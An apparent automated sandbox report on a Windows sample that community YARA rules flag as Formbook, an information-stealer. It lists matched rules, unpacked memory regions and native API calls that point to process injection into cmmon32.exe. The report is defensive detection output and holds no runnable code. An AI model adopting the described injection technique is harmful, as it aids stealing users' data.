          Source: Yara matchFile source: 00000001.00000002.274258003.00000000008B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.477190198.0000000004210000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.274280539.00000000008E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.220100225.0000000002290000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.1.UGGJ4NnzFz.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.UGGJ4NnzFz.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.UGGJ4NnzFz.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.UGGJ4NnzFz.exe.2290000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.UGGJ4NnzFz.exe.2290000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.UGGJ4NnzFz.exe.400000.0.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000001.00000001.216556670.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000001.216556670.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.475444887.00000000003A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.475444887.00000000003A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.477114884.00000000041D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.477114884.00000000041D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.274028278.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.274028278.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.274258003.00000000008B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.274258003.00000000008B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.477190198.0000000004210000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.477190198.0000000004210000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.274280539.00000000008E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.274280539.00000000008E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.220100225.0000000002290000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.220100225.0000000002290000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.1.UGGJ4NnzFz.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.1.UGGJ4NnzFz.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.1.UGGJ4NnzFz.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.1.UGGJ4NnzFz.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.UGGJ4NnzFz.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.UGGJ4NnzFz.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.UGGJ4NnzFz.exe.2290000.3.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.UGGJ4NnzFz.exe.2290000.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.UGGJ4NnzFz.exe.2290000.3.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.UGGJ4NnzFz.exe.2290000.3.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.UGGJ4NnzFz.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.UGGJ4NnzFz.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_004181C0 NtCreateFile,1_2_004181C0
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00418270 NtReadFile,1_2_00418270
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_004182F0 NtClose,1_2_004182F0
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_004183A0 NtAllocateVirtualMemory,1_2_004183A0
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_004181BC NtCreateFile,1_2_004181BC
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_004182EB NtClose,1_2_004182EB
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_0041839B NtAllocateVirtualMemory,1_2_0041839B
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009D98F0 NtReadVirtualMemory,LdrInitializeThunk,1_2_009D98F0
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009D9840 NtDelayExecution,LdrInitializeThunk,1_2_009D9840
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009D9860 NtQuerySystemInformation,LdrInitializeThunk,1_2_009D9860
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009D99A0 NtCreateSection,LdrInitializeThunk,1_2_009D99A0
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009D9910 NtAdjustPrivilegesToken,LdrInitializeThunk,1_2_009D9910
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009D9A00 NtProtectVirtualMemory,LdrInitializeThunk,1_2_009D9A00
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009D9A20 NtResumeThread,LdrInitializeThunk,1_2_009D9A20
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009D9A50 NtCreateFile,LdrInitializeThunk,1_2_009D9A50
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009D95D0 NtClose,LdrInitializeThunk,1_2_009D95D0
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009D9540 NtReadFile,LdrInitializeThunk,1_2_009D9540
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009D96E0 NtFreeVirtualMemory,LdrInitializeThunk,1_2_009D96E0
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009D9660 NtAllocateVirtualMemory,LdrInitializeThunk,1_2_009D9660
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009D9780 NtMapViewOfSection,LdrInitializeThunk,1_2_009D9780
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009D97A0 NtUnmapViewOfSection,LdrInitializeThunk,1_2_009D97A0
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009D9FE0 NtCreateMutant,LdrInitializeThunk,1_2_009D9FE0
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009D9710 NtQueryInformationToken,LdrInitializeThunk,1_2_009D9710
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009D98A0 NtWriteVirtualMemory,1_2_009D98A0
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009D9820 NtEnumerateKey,1_2_009D9820
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009DB040 NtSuspendThread,1_2_009DB040
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009D99D0 NtCreateProcessEx,1_2_009D99D0
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009D9950 NtQueueApcThread,1_2_009D9950
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009D9A80 NtOpenDirectoryObject,1_2_009D9A80
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009D9A10 NtQuerySection,1_2_009D9A10
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009DA3B0 NtGetContextThread,1_2_009DA3B0
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009D9B00 NtSetValueKey,1_2_009D9B00
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009D95F0 NtQueryInformationFile,1_2_009D95F0
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009DAD30 NtSetContextThread,1_2_009DAD30
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009D9520 NtWaitForSingleObject,1_2_009D9520
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009D9560 NtWriteFile,1_2_009D9560
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009D96D0 NtCreateKey,1_2_009D96D0
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009D9610 NtEnumerateValueKey,1_2_009D9610
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009D9650 NtQueryValueKey,1_2_009D9650
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009D9670 NtQueryInformationProcess,1_2_009D9670
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009DA710 NtOpenProcessToken,1_2_009DA710
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009D9730 NtQueryVirtualMemory,1_2_009D9730
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045B9540 NtReadFile,LdrInitializeThunk,9_2_045B9540
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045B95D0 NtClose,LdrInitializeThunk,9_2_045B95D0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045B9650 NtQueryValueKey,LdrInitializeThunk,9_2_045B9650
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045B9660 NtAllocateVirtualMemory,LdrInitializeThunk,9_2_045B9660
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045B96D0 NtCreateKey,LdrInitializeThunk,9_2_045B96D0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045B96E0 NtFreeVirtualMemory,LdrInitializeThunk,9_2_045B96E0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045B9710 NtQueryInformationToken,LdrInitializeThunk,9_2_045B9710
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045B9FE0 NtCreateMutant,LdrInitializeThunk,9_2_045B9FE0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045B9780 NtMapViewOfSection,LdrInitializeThunk,9_2_045B9780
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045B9840 NtDelayExecution,LdrInitializeThunk,9_2_045B9840
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045B9860 NtQuerySystemInformation,LdrInitializeThunk,9_2_045B9860
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045B9910 NtAdjustPrivilegesToken,LdrInitializeThunk,9_2_045B9910
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045B99A0 NtCreateSection,LdrInitializeThunk,9_2_045B99A0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045B9A50 NtCreateFile,LdrInitializeThunk,9_2_045B9A50
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045B9560 NtWriteFile,9_2_045B9560
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045BAD30 NtSetContextThread,9_2_045BAD30
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045B9520 NtWaitForSingleObject,9_2_045B9520
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045B95F0 NtQueryInformationFile,9_2_045B95F0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045B9670 NtQueryInformationProcess,9_2_045B9670
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045B9610 NtEnumerateValueKey,9_2_045B9610
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045BA770 NtOpenThread,9_2_045BA770
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045B9770 NtSetInformationFile,9_2_045B9770
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045B9760 NtOpenProcess,9_2_045B9760
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045BA710 NtOpenProcessToken,9_2_045BA710
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045B9730 NtQueryVirtualMemory,9_2_045B9730
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045B97A0 NtUnmapViewOfSection,9_2_045B97A0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045BB040 NtSuspendThread,9_2_045BB040
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045B9820 NtEnumerateKey,9_2_045B9820
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045B98F0 NtReadVirtualMemory,9_2_045B98F0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045B98A0 NtWriteVirtualMemory,9_2_045B98A0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045B9950 NtQueueApcThread,9_2_045B9950
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045B99D0 NtCreateProcessEx,9_2_045B99D0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045B9A10 NtQuerySection,9_2_045B9A10
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045B9A00 NtProtectVirtualMemory,9_2_045B9A00
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045B9A20 NtResumeThread,9_2_045B9A20
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045B9A80 NtOpenDirectoryObject,9_2_045B9A80
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045B9B00 NtSetValueKey,9_2_045B9B00
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045BA3B0 NtGetContextThread,9_2_045BA3B0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_003B81C0 NtCreateFile,9_2_003B81C0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_003B8270 NtReadFile,9_2_003B8270
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_003B82F0 NtClose,9_2_003B82F0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_003B83A0 NtAllocateVirtualMemory,9_2_003B83A0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_003B81BC NtCreateFile,9_2_003B81BC
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_003B82EB NtClose,9_2_003B82EB
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_003B839B NtAllocateVirtualMemory,9_2_003B839B
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 0_2_0040323C EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,0_2_0040323C
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 0_2_004048530_2_00404853
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 0_2_004061310_2_00406131
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 0_2_73751A980_2_73751A98
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_0041D0421_2_0041D042
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_004010301_2_00401030
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_0041CB691_2_0041CB69
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00408C5B1_2_00408C5B
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00408C601_2_00408C60
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00402D871_2_00402D87
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00402D901_2_00402D90
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_0041CF4E1_2_0041CF4E
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00402FB01_2_00402FB0
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009AB0901_2_009AB090
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A620A81_2_00A620A8
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009C20A01_2_009C20A0
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A628EC1_2_00A628EC
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A6E8241_2_00A6E824
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A510021_2_00A51002
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009BA8301_2_009BA830
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009B99BF1_2_009B99BF
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_0099F9001_2_0099F900
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009B41201_2_009B4120
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A622AE1_2_00A622AE
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A4FA2B1_2_00A4FA2B
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009CEBB01_2_009CEBB0
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A5DBD21_2_00A5DBD2
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A503DA1_2_00A503DA
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A62B281_2_00A62B28
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009BAB401_2_009BAB40
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009A841F1_2_009A841F
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A5D4661_2_00A5D466
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009C25811_2_009C2581
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009AD5E01_2_009AD5E0
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A625DD1_2_00A625DD
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A62D071_2_00A62D07
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00990D201_2_00990D20
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A61D551_2_00A61D55
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A62EF71_2_00A62EF7
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009B6E301_2_009B6E30
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A5D6161_2_00A5D616
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A61FF11_2_00A61FF1
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A6DFCE1_2_00A6DFCE
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_0463D4669_2_0463D466
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_0458841F9_2_0458841F
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_04641D559_2_04641D55
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_04642D079_2_04642D07
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_04570D209_2_04570D20
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_0458D5E09_2_0458D5E0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_046425DD9_2_046425DD
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045A25819_2_045A2581
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_04596E309_2_04596E30
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_0463D6169_2_0463D616
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_04642EF79_2_04642EF7
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_04641FF19_2_04641FF1
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_0464DFCE9_2_0464DFCE
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_0464E8249_2_0464E824
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_046310029_2_04631002
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_0459A8309_2_0459A830
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_046428EC9_2_046428EC
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_0458B0909_2_0458B090
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_046420A89_2_046420A8
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045A20A09_2_045A20A0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_0457F9009_2_0457F900
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045941209_2_04594120
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045999BF9_2_045999BF
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_0462FA2B9_2_0462FA2B
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_046422AE9_2_046422AE
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_0459AB409_2_0459AB40
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_04642B289_2_04642B28
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_0463DBD29_2_0463DBD2
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_046303DA9_2_046303DA
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045AEBB09_2_045AEBB0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_003BD0429_2_003BD042
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_003BCB699_2_003BCB69
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_003A8C609_2_003A8C60
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_003A8C5B9_2_003A8C5B
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_003A2D909_2_003A2D90
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_003A2D879_2_003A2D87
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_003BCF4E9_2_003BCF4E
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_003A2FB09_2_003A2FB0
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: String function: 0099B150 appears 72 times
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: String function: 0457B150 appears 72 times
          Source: UGGJ4NnzFz.exe, 00000000.00000003.217329027.00000000099D6000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs UGGJ4NnzFz.exe
          Source: UGGJ4NnzFz.exe, 00000001.00000002.274341058.0000000000939000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameCMMON32.exe` vs UGGJ4NnzFz.exe
          Source: UGGJ4NnzFz.exe, 00000001.00000002.274699413.0000000000C1F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs UGGJ4NnzFz.exe
          Source: UGGJ4NnzFz.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: 00000001.00000001.216556670.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000001.216556670.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.475444887.00000000003A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.475444887.00000000003A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.477114884.00000000041D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.477114884.00000000041D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.274028278.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.274028278.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
